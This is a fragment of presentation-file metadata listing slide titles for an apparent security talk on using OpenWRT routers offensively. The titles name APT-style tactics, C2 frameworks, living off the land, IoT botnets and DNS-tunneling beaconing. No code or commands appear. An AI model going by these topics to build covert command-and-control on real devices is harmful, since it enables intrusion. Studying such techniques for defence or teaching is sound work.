      <vt:lpstr>Install OpenWRT</vt:lpstr>
      <vt:lpstr>OpenWRT is installed!  Remember to set your password on reboot.</vt:lpstr>
      <vt:lpstr>OK, who cares? You installed OpenWRT….</vt:lpstr>
      <vt:lpstr> THINK LIKE AN APT. THINK LIKE YOUR ADVERSARIES.</vt:lpstr>
      <vt:lpstr>C2 Frameworks &amp; Tools</vt:lpstr>
      <vt:lpstr>Living off the Land - </vt:lpstr>
      <vt:lpstr>What are some techniques &amp; ideas that advanced APT groups leverage that you now have at your disposal?</vt:lpstr>
      <vt:lpstr>IoT Botnets – Genius use of Low Resource Hacking and Building Your Own Protocols</vt:lpstr>
      <vt:lpstr>DNS Tunneling and DDNS Based Beaconing inside Device Self-Registration Services</vt:lpstr>
      <vt:lpstr>GET HACKING.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2025-07-20T18:38:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-08T13:50:28Z</dcterms:modified>
</cp:coreProperties>
</file>